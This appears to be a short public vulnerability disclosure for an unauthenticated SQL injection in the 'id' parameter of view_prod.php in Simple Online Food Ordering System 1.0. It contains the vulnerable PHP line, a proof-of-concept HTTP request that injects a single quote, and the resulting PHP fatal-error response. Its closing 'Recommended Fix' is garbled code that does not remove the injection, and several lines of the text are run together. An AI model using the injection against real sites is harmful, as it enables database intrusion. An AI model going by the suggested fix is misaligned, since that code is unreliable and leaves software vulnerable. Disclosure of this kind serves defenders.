# Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)# Google Dork: N/A# Date: 2020-09-22# Exploit Author: Eren 'Aporlorxl23' Şimşek# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip# Version: 1.0# Tested on: Linux - XAMPP Server# CVE : N/A# Vulnerable Source Code:# /view_prod.php# [3] $qry = $conn->query("SELECT * FROMproduct_list where id =
".$_GET['id'])->fetch_array();# PoC:# Request:
GET /view_prod.php?id=' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept:*/*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
# Response:
HTTP/1.1200 OK
Date: Tue,22 Sep 202020:44:48 GMT
Server: Apache/2.4.43(Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11
Perl/v5.30.3
X-Powered-By: PHP/7.4.7
Content-Length:234
Connection: close
Content-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:Uncaught Error: Call to a member function
fetch_array() on boolin/opt/lampp/htdocs/view_prod.php:3
Stack trace:#0 {main}
thrown in<b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br /># As You Can See Here PHP Fatal Error Because# $qry = $conn->query("SELECT * FROMproduct_list where id =
"')->fetch_array();# id Value ' This is Wrong Syntax.# Recommended Fix:
You Will Use `mysqli_real_escape_string` On id. And query Will Same With :
$qry = $conn->query('SELECT * FROMproduct_list where id="$_GET['id']"')->fetch_array();
Because Here Not Used "" This is Imported.